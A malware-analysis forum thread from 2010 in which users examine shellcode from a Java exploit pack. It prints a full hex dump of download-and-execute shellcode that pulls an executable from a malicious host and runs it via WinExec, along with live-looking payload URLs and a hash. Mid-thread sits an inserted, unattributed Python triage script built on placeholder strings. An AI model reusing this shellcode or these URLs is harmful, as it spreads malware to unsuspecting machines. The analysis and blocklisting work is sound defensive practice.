Author Topic: Shellcode analysis?  (Read 4592 times)


February 13, 2010, 06:15:06 am

Garlando
Hi,
I was investigating a Java exploit and decided to take a look at the shellcode.

Code:
505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F3139322E616E74697672323030392E636E2F73656E632E657865009026
Code: (the same bytes rendered as raw text; only the printable strings survive)
GetTempPathA
LoadLibraryA
GetProcAddress
WinExec
URLMON.DLL
URLDownloadToFileA
pdfupd.exe
crash.php
http://192.antivr2009.cn/senc.exe
It uses URLDownloadToFileA to download the malware as pdfupd.exe from hxxp://192.antivr2009.cn/senc.exe.
But what left me wondering is the string 'crash.php'. Can anyone explain to me the purpose of this string? I'm not very talented at analysing malware, so if anyone can clarify this for me I'd be very happy.

Thanks, Garland

February 14, 2010, 09:37:00 pm
Reply #1

MysteryFCM
What's the URL that houses this?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

February 15, 2010, 12:17:11 pm
Reply #2

Garlando
Quote from: MysteryFCM
What's the URL that houses this?

It's down now, but this site offers the same exploit pack:

Code:
miamiheraldsi.com/in0/index.php
It's in the params of the Java exploit.

February 15, 2010, 01:24:44 pm
Reply #3

MysteryFCM
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are:

Code:
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param; it still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

February 15, 2010, 01:29:07 pm
Reply #4

SysAdMini
Quote from: MysteryFCM
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are:

Code:
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param; it still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

Added this morning.

http://www.malwaredomainlist.com/mdl.php?search=miamiheraldsi.com&colsearch=All&quantity=50
Ruining the bad guy's day

February 15, 2010, 01:39:29 pm
Reply #5

Garlando
Quote from: MysteryFCM
Ah, came across that one earlier ... some lovely code it's got. The shellcode is an exploit (not identified what crash.php is for yet), and the payloads are:

Code:
http://miamiheraldsi.com/in0/l.php?i=7
http://miamiheraldsi.com/in0/l.php?i=14

Doesn't seem to matter what you put for the i= param; it still gives the same content length (131K, MD5: 73B4B7CBE2E65B5385DB30F070534F21).

Sorry, I mean the param tags in the decoded JavaScript:

<applet src=gsb50.jar ....something other....>
<param name='sc' value='the shellcode'>
</applet>
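Both the hex dump in the first post and the applet tag above describe the same static-analysis workflow: pull the hex out of the `sc` param, decode it to bytes, recover the NUL-separated strings, and read the API names and URL off them. The script below is an added example, not code from this thread or from any of the posters; it is a defender's triage helper that walks those steps end to end. Everything in it is constructed: the landing-page fragment (`SAMPLE_HTML`), the byte sample behind it (a handful of filler bytes followed by strings shaped like the ones in the real dump, with `example.invalid` and `update.exe` standing in for the real URL and file name), and the `API_HINTS` table, which is just general Win32 knowledge. The hex string from the first post can be pasted straight into `decode_hex` if you want to run the same pass over the real sample.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional

# Constructed sample, not the shellcode from the first post: a few filler bytes
# followed by NUL-separated strings of the same kind the real dump carries.
SAMPLE_BYTES = (
    b"\xe8\x00\x00\x00\x00\x5d\x83\xed\x0d\x31\xc0"          # filler (non-printable)
    b"GetTempPathA\x00LoadLibraryA\x00GetProcAddress\x00WinExec\x00"
    b"URLMON.DLL\x00URLDownloadToFileA\x00"
    b"update.exe\x00http://example.invalid/payload.exe\x00"
)
SAMPLE_HEX = SAMPLE_BYTES.hex().upper()

# Constructed decoded-landing-page fragment in the shape Garlando describes.
SAMPLE_HTML = (
    "<applet archive='gsb50.jar' code='Main.class' width='1' height='1'>"
    f"<param name='sc' value='{SAMPLE_HEX}'>"
    "</applet>"
)

# Win32 APIs that commonly show up as plain strings in download-and-execute
# shellcode, with what each is typically used for (assumed general knowledge).
API_HINTS: Dict[str, str] = {
    "GetTempPathA": "locate %TEMP% as a drop directory",
    "LoadLibraryA": "load a DLL by name at runtime",
    "GetProcAddress": "resolve further imports by name",
    "URLDownloadToFileA": "download a URL to a local file (urlmon.dll)",
    "WinExec": "launch a program",
}


class _ScParamParser(HTMLParser):
    """Collect the value of the first <param name='sc' value='...'> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.value: Optional[str] = None

    def handle_starttag(self, tag, attrs):
        if tag == "param" and self.value is None:
            a = dict(attrs)
            if a.get("name") == "sc":
                self.value = a.get("value")


def extract_sc_param(html: str) -> Optional[str]:
    """Return the hex string handed to the applet, or None if there is no such param."""
    p = _ScParamParser()
    p.feed(html)
    return p.value


def decode_hex(hexstr: str) -> bytes:
    """Decode a hex dump, refusing odd-length or non-hex input instead of guessing."""
    cleaned = re.sub(r"\s+", "", hexstr)
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", cleaned):
        raise ValueError("not a clean even-length hex string")
    return bytes.fromhex(cleaned)


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII at least min_len long, in order of appearance."""
    pattern = rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}"
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked or auto-linked in a report."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def triage(strings: List[str]) -> Dict[str, object]:
    """Group recovered strings into APIs, URLs and file names and give a verdict."""
    apis = [s for s in strings if s in API_HINTS]
    urls = [s for s in strings if re.match(r"https?://", s)]
    files = [s for s in strings
             if s not in urls and re.search(r"\.(exe|dll|php)$", s, re.I)]
    verdict = ("download-and-execute"
               if {"URLDownloadToFileA", "WinExec"} <= set(apis) else "unclassified")
    return {"apis": apis, "urls": urls, "files": files, "verdict": verdict}


def analyze_page(html: str) -> Dict[str, object]:
    """Full pipeline: applet param -> bytes -> strings -> triage."""
    hexstr = extract_sc_param(html)
    if hexstr is None:
        return {"apis": [], "urls": [], "files": [], "verdict": "no sc param"}
    return triage(printable_strings(decode_hex(hexstr)))


if __name__ == "__main__":
    report = analyze_page(SAMPLE_HTML)
    print("verdict:", report["verdict"])
    for api in report["apis"]:
        print(f"  {api:<20} {API_HINTS[api]}")
    for url in report["urls"]:
        print("  url:", defang(url))
    print("  files:", ", ".join(report["files"]))
```

The verdict rule is deliberately narrow: it only says "download-and-execute" when both the download API and the launch API are present as strings, which is exactly the pair the first post spotted. A string that the table does not explain (the thread's `crash.php` is one) still lands in the `files` list, so it is surfaced for a human rather than silently dropped; the script does not guess at its purpose, and neither does the thread.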

February 15, 2010, 01:43:02 pm
Reply #6

MysteryFCM
Hehe, cool :) (related to learn-to-knit.com, the site that led me to it). I've just added the payload URLs to MDL :) (just got back home, so finally able to analyze it).

@Garlando,
There are actually two. The first (commented out for some reason, likely because of the second one) points to l.php?i=10, the second points to i=9. Again, however, I can't find any reference or active URL for pdfupd.exe (not run it on the test machine yet, but guessing pdfupd.exe is the filename it's downloaded as) nor for crash.php.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net